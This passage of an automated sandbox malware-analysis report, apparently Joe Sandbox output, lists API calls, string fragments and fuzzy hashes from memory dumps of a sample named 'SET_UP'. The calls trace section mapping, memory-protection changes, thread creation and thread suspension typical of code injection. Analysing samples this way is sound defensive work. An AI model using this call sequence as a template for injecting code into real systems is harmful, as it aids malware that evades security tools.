                                                                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0254FE1C
                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 0254FEC4
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02550238
                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 025502ED
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0255030A
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 025503AD
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 025503E0
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02550551
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1248616170-0
                                                                                                                                            • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                            • Instruction ID: 8331c6de686b6805ea60710273b07a1cad6d6db07fb6c6b7302caeed84c1aa9e
                                                                                                                                            • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                            • Instruction Fuzzy Hash: 9F428871608361AFDB24CF28C854B6BBBE9BF88714F04492EFD859B291E730E944CB55

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02500619,?,00000001,?,81EC8B55,000000FF), ref: 02500B11
                                                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 02500B3D
                                                                                                                                            • Wow64SuspendThread.KERNEL32(00000000), ref: 02500B90
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02500BBA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1849706056-0
                                                                                                                                            • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                            • Instruction ID: e10ca440ff832ec7e0f6439c5db4703e497e0ee367b24d4c3ab2f1617150cc43
                                                                                                                                            • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                            • Instruction Fuzzy Hash: F5410E71600108AFDB18DF58C890FADBBB6EF88304F10C168E6159B7D4DB74AE45CB94

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02500666
                                                                                                                                            • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0250095A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcessTerminateThread
                                                                                                                                            • String ID: v"3f
                                                                                                                                            • API String ID: 1197810419-73601935
                                                                                                                                            • Opcode ID: 096e607a30dfc29cd575bf7d30eaa5a995d47dbfd4d34719b5295a21263b7965
                                                                                                                                            • Instruction ID: 95cbec5c20d2b3547885c6df35bb7e53396639ab46c7c36e862d4da2c15ec271
                                                                                                                                            • Opcode Fuzzy Hash: 096e607a30dfc29cd575bf7d30eaa5a995d47dbfd4d34719b5295a21263b7965
                                                                                                                                            • Instruction Fuzzy Hash: 4912C3B5E00219DFDB14CF98C990BADBBB2FF88304F2486A9D515AB385C7746A41CF58

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02500A4F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID: ,
                                                                                                                                            • API String ID: 2422867632-3772416878
                                                                                                                                            • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                            • Instruction ID: a18b985ba08ae757930e2584beebd0d4d1cd9f10ed4e53b5ea79027b54d8e23b
                                                                                                                                            • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                            • Instruction Fuzzy Hash: 5941C474A00209EFDB04CF99C994BAEBBB1BF88314F208598D5156B3C1C771AE81CF98

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02550A93
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                            • String ID: .dll
                                                                                                                                            • API String ID: 1029625771-2738580789
                                                                                                                                            • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                            • Instruction ID: edb4ef9b49d6a3656b8d85a0404d971ff804d4f01a9182ad4175d37850486828
                                                                                                                                            • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                            • Instruction Fuzzy Hash: AB210A356002A58FEB11CFB8C454B6E7FE4BF09324F18416EEC0587681D770E845CB84

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0254F6CD
                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0254FA11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                            • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                            • Instruction ID: 80ccbaca46290a10869e280b3b116d358514d417ddbdb71e3e89ba9419c8c979
                                                                                                                                            • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                            • Instruction Fuzzy Hash: 7EB1E571500B06BBDB259E68CC80FABFBE9FF4931CF10051AE94996950DB31E550CFAA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $!$"$"$"$#$%$%$%$%$'$($)$)$*$*$+$+$+$,$-$-$.$/$/$1$2$2$3$5$5$7$8$8$8$9$9$;$;$=$?$@$@$@$B$B$C$D$D$D$F$H$I$I$J$J$K$L$L$L$M$N$N$N$O$P$R$X$Z$Z$]$`$`$a$b$d$eb$f$h$i$i$j$j$k$l$l$n$p$q$r$r$s$t$t$u$v$w$w$x$y$z${$|$}$~$~
                                                                                                                                            • API String ID: 0-1858622422
                                                                                                                                            • Opcode ID: 6b697dce1f09686039ce7f42cfd623d9e4e89870b72689b23e587473ef7bb46b
                                                                                                                                            • Instruction ID: 844368dba2ab40162ef79527f025e0c8ecc571b8e80c815c1ba6ae1be71331b6
                                                                                                                                            • Opcode Fuzzy Hash: 6b697dce1f09686039ce7f42cfd623d9e4e89870b72689b23e587473ef7bb46b
                                                                                                                                            • Instruction Fuzzy Hash: 6C139A3150C7C18AE3259B3888943AEBFD1ABD6324F088E6DD5E9873D2D7788445CB5B

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $"$&$'$($)$*$,$-$-$.$/$0$0$0$1$2$2$2$3$4$6$6$7$8$9$:$<$<$=$>$>$?$@$J$L$X$z
                                                                                                                                            • API String ID: 0-434540074
                                                                                                                                            • Opcode ID: bbe8b5945c93c7fe01e2a09f5012a1834117af991db320341471937a4c8a79f1
                                                                                                                                            • Instruction ID: 81db0f9076b4735a526b61190b0f00d35012a33a85d14f7fbc9c2376802e4374
                                                                                                                                            • Opcode Fuzzy Hash: bbe8b5945c93c7fe01e2a09f5012a1834117af991db320341471937a4c8a79f1
                                                                                                                                            • Instruction Fuzzy Hash: 75E1C2219087E98EDB26C77C88483CDBFB16B53224F1843D9D4E86B3D2D7750A46CB66

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 9^;$4O$A@$W=$`a$n)l+$nYm[$pj$xAzC$xI{K$|MzO$ &$,"$06$4*$8>$PV$tj$x~$x~
                                                                                                                                            • API String ID: 0-832761812
                                                                                                                                            • Opcode ID: f88da86a2897718c38f9c79cb25eeb3818ee125a641693974b99d4585c679e21
                                                                                                                                            • Instruction ID: 639cedbbf6f5afcf29c884528ea0640d2281ebe85296a61c356b56512e4d34c7
                                                                                                                                            • Opcode Fuzzy Hash: f88da86a2897718c38f9c79cb25eeb3818ee125a641693974b99d4585c679e21
                                                                                                                                            • Instruction Fuzzy Hash: D5A2C9B460D3C48AD334CF14C542BCFBAF1EB82344F40892DC6E95B256D7B6464A9B9B

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: +$+$,$-$.$:$?$N$b$f$f$i$l$v
                                                                                                                                            • API String ID: 0-397903110
                                                                                                                                            • Opcode ID: e03532ba04dbf17b6f32a386bb26a61e3e1756ae3b5aa20e62f5f29cf1fb7916
                                                                                                                                            • Instruction ID: 65c8e9c043a4db3fe8a81f6ab43dccf38a8867c3cdaa2daffe571f7467a99dea
                                                                                                                                            • Opcode Fuzzy Hash: e03532ba04dbf17b6f32a386bb26a61e3e1756ae3b5aa20e62f5f29cf1fb7916
                                                                                                                                            • Instruction Fuzzy Hash: 2B827C7160CB818BD3289B38C4943AEBBE2BBC9314F198E6DD5DA873D1DA748545CB07

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $"$$$&$($*$,$.$4$8$<$>$G
                                                                                                                                            • API String ID: 0-747527269
                                                                                                                                            • Opcode ID: 57562f8241f462db47a9093afd7393ae8bd006bb2ca9aad671c38d73d7bde821
                                                                                                                                            • Instruction ID: f12afe5989d412080e239766d63fdac57b994706e43a3f1461e4f9d548e619fb
                                                                                                                                            • Opcode Fuzzy Hash: 57562f8241f462db47a9093afd7393ae8bd006bb2ca9aad671c38d73d7bde821
                                                                                                                                            • Instruction Fuzzy Hash: 75122561508BC18EE326CB3C8848A46BFD16B67234F09C7D9E4F98F3E7D2659106C766
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$&$+$4$5$5$H$I$h$i$m$o
                                                                                                                                            • API String ID: 0-1055871813
                                                                                                                                            • Opcode ID: 656b777705db2729c17918ffb7b1babcc1b1b4eb9181cce4d32374eeba699382
                                                                                                                                            • Instruction ID: ed1ae693c3b29a5712acfc34f44128e28f44b2978d76b95d72fed8db470d0cc4
                                                                                                                                            • Opcode Fuzzy Hash: 656b777705db2729c17918ffb7b1babcc1b1b4eb9181cce4d32374eeba699382
                                                                                                                                            • Instruction Fuzzy Hash: 93811671D083998FDB22CF78C8843DDBFB16B4A320F1846A9C495AB3C2C7744A46CB55
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6Cjz$9?$I$L@EE$MKYT$OVK[$Q$$WCSW$Z[CD$czgw$w
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: -$2&<`$Vj o
                                                                                                                                            • API String ID: 0-4013841480
                                                                                                                                            • Opcode ID: 83bbf94eafdc4ae29a338e2026d0ca5b789be40464f5c298abb6dbd50a111ba0
                                                                                                                                            • Instruction ID: 24aede1ce56d0d43e4584b8fa46bc51ccc5bff831d555c87da50b5555121f421
                                                                                                                                            • Opcode Fuzzy Hash: 83bbf94eafdc4ae29a338e2026d0ca5b789be40464f5c298abb6dbd50a111ba0
                                                                                                                                            • Instruction Fuzzy Hash: FEA1243050C3A28BD339CF2884617BBBFE1AF97314F18496DD4D9972C2D77884098B96
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: }{$}~
                                                                                                                                            • API String ID: 0-750507644
                                                                                                                                            • Opcode ID: 4523f89c0784cc2d44093adb829dad02dced3539e37ad648681613bc814ba41b
                                                                                                                                            • Instruction ID: 13aa4a2a934dc7a9104ebbf09012dbc08747ada9dd3edbaf6c980f906eb2af0e
                                                                                                                                            • Opcode Fuzzy Hash: 4523f89c0784cc2d44093adb829dad02dced3539e37ad648681613bc814ba41b
                                                                                                                                            • Instruction Fuzzy Hash: 220216755083228BD724CF28C4906ABBBF2FFD5764F19992DE8C99B3A0E7348841C746
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #"! $}
                                                                                                                                            • API String ID: 0-1365762979
                                                                                                                                            • Opcode ID: 8eea1f4ba102a5f63d7a380aec1b2632936cb7d700f8d8f5d7bdc8a8f683ffee
                                                                                                                                            • Instruction ID: b3c182d336c5bf692111c23b70f0113169e898263559f5c27c49a2bc0dda5881
                                                                                                                                            • Opcode Fuzzy Hash: 8eea1f4ba102a5f63d7a380aec1b2632936cb7d700f8d8f5d7bdc8a8f683ffee
                                                                                                                                            • Instruction Fuzzy Hash: 81D15A72A043218BD718CEA4C88577BB7A2FBD6314F19892DD8865B3C1D735A80DC7A9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: a{$~y
                                                                                                                                            • API String ID: 0-3182041098
                                                                                                                                            • Opcode ID: 3d454d49985a2a0e3b941ede6320639c585380cceb87bdbe4e8007742991eaa4
                                                                                                                                            • Instruction ID: 6d4cc9258561073a9594305d7586ff239f170667fd227ce06e817aa9cbd82663
                                                                                                                                            • Opcode Fuzzy Hash: 3d454d49985a2a0e3b941ede6320639c585380cceb87bdbe4e8007742991eaa4
                                                                                                                                            • Instruction Fuzzy Hash: 56B1F2759083108BD724DF28C89267BBBF1FF86324F098A5CE9D59B390E7349905C78A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,w|y$q^jd
                                                                                                                                            • API String ID: 0-2006020141
                                                                                                                                            • Opcode ID: e44ec9f5972295231e1a7f95af0708fdedf6b1ccd8b975f045f7f121f95a013f
                                                                                                                                            • Instruction ID: cb72798b86513932922b2ed281c97901f4f23d9f8c4ce9382925d6c797246bcb
                                                                                                                                            • Opcode Fuzzy Hash: e44ec9f5972295231e1a7f95af0708fdedf6b1ccd8b975f045f7f121f95a013f
                                                                                                                                            • Instruction Fuzzy Hash: 62C14C329183648FD714CEA4C8452BB7BA2FB97340F08C96DE9858B3C5D338D909D7A9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: )$IEND
                                                                                                                                            • API String ID: 0-707183367
                                                                                                                                            • Opcode ID: d282cb71a6565c87ad7bf32bce1f9429e71d541d9426edf688742cf3a915deb3
                                                                                                                                            • Instruction ID: 7a21d9754596ccb616252df7499b83b2fe9ae8c424252caafa0d13874db9a313
                                                                                                                                            • Opcode Fuzzy Hash: d282cb71a6565c87ad7bf32bce1f9429e71d541d9426edf688742cf3a915deb3
                                                                                                                                            • Instruction Fuzzy Hash: 1FD18BB19083459BD720CF14DC84B9ABBE4BB94304F44492DF9999B3C2E375E908CF9A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ()$A<=2
                                                                                                                                            • API String ID: 0-3644477229
                                                                                                                                            • Opcode ID: 13cead21adfc3660f62ffef5166130110384360239f5b3c3a1c31cea8a528ae9
                                                                                                                                            • Instruction ID: 1e0cbf560021110380a63c7f9c49140ccaae84e80524269b72b7184d49f74de2
                                                                                                                                            • Opcode Fuzzy Hash: 13cead21adfc3660f62ffef5166130110384360239f5b3c3a1c31cea8a528ae9
                                                                                                                                            • Instruction Fuzzy Hash: B19102B16093158BD314DF28C8927ABB7F1FF85354F08996CE8968B391E778C504CB4A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: -*$y{
                                                                                                                                            • API String ID: 0-2836670745
                                                                                                                                            • Opcode ID: 6cc00925bffcdce1ee7ce2de3b6d5e5d096557378b2750a9a0660d1b5e774ca4
                                                                                                                                            • Instruction ID: ecbf11a0fe4598c17b307bcf43140bf16f84f2fc8300ef6f7b91b770068a707a
                                                                                                                                            • Opcode Fuzzy Hash: 6cc00925bffcdce1ee7ce2de3b6d5e5d096557378b2750a9a0660d1b5e774ca4
                                                                                                                                            • Instruction Fuzzy Hash: 8471F2B295C3509BE718DF65C84156FBBF2EFC1314F48892CF5C68B241E635CA098B8A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 7$gfff
                                                                                                                                            • API String ID: 0-3777064726
                                                                                                                                            • Opcode ID: 7d0e5fa15a847eb0a20af8f6850efbcd8d9db661e09e237ac2fc1ecf391396a1
                                                                                                                                            • Instruction ID: 1ecd1b0e3c0e4f56fd2339aeb896789b88c9c1ce40d162c0e4717fb38d27f1a8
                                                                                                                                            • Opcode Fuzzy Hash: 7d0e5fa15a847eb0a20af8f6850efbcd8d9db661e09e237ac2fc1ecf391396a1
                                                                                                                                            • Instruction Fuzzy Hash: BD6126766142104FE314CF2DCC55B6BB7D2ABC5328F19CA79E499C7291DB38C846CB49
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: L$qr
                                                                                                                                            • API String ID: 0-2663492237
                                                                                                                                            • Opcode ID: 20aecfe946979eed5e562ca66601960c3d66dc17e684e02ab7c8fb984b1e249d
                                                                                                                                            • Instruction ID: 69e92f8db0107abff2a9313dd7eba84487fa09d0861d66c1b6b95341e11e1589
                                                                                                                                            • Opcode Fuzzy Hash: 20aecfe946979eed5e562ca66601960c3d66dc17e684e02ab7c8fb984b1e249d
                                                                                                                                            • Instruction Fuzzy Hash: 5D51C372A5C3264BD718CF39980129FF6E2ABC4214F0AC93DD495DB381DA74C50A8BC6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: [U$_8Y
                                                                                                                                            • API String ID: 0-1769107113
                                                                                                                                            • Opcode ID: 48076ce9a52beb17b8c5ea630022c16e9e5239f74c0bd8c9b8a234c0ba14967a
                                                                                                                                            • Instruction ID: 7f58e591aceba7e8cd94fd7c39ab4c69ab552a8093d39f2b6de7130801e8de0b
                                                                                                                                            • Opcode Fuzzy Hash: 48076ce9a52beb17b8c5ea630022c16e9e5239f74c0bd8c9b8a234c0ba14967a
                                                                                                                                            • Instruction Fuzzy Hash: DA51A07160C3108BE724DF29C85272BBBF1EF96718F14495CE8D59B291E339D502CB4A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FG
                                                                                                                                            • API String ID: 0-255995471
                                                                                                                                            • Opcode ID: 5f4c62b8eee3854e5845d4c7cc9f491471021144c18d031431836d4e0dba5ec0
                                                                                                                                            • Instruction ID: 9e027c722202a1b09089e6ccc156680e396e015dbdf8167b0b1fa32932c14a40
                                                                                                                                            • Opcode Fuzzy Hash: 5f4c62b8eee3854e5845d4c7cc9f491471021144c18d031431836d4e0dba5ec0
                                                                                                                                            • Instruction Fuzzy Hash: E882E1746083419BF7259B24D881B2BBFE2FFC6718F28882CE5C547262D771D846CB5A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: f
                                                                                                                                            • API String ID: 0-1993550816
                                                                                                                                            • Opcode ID: 617e2c46c5da944dbde900e93ad42fb2cbbed75b6950a5affe13006b49ce5f4a
                                                                                                                                            • Instruction ID: 9383fbabf50fed4461fc523d74c8235ed9ff4eec49c31796c68514ba3869291a
                                                                                                                                            • Opcode Fuzzy Hash: 617e2c46c5da944dbde900e93ad42fb2cbbed75b6950a5affe13006b49ce5f4a
                                                                                                                                            • Instruction Fuzzy Hash: 372203716083018FC719CF28C890B6ABBE2BFD8318F19897CE8958B391E775D945CB46
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: XY
                                                                                                                                            • API String ID: 0-554446067
                                                                                                                                            • Opcode ID: dea41095a41f694388628f6acae864739dca9d54eb0c94e04d4e19212d53dbe2
                                                                                                                                            • Instruction ID: ee99114fea72278750537ed0275cf0ec92b0c34636c0cf853102efaad6366578
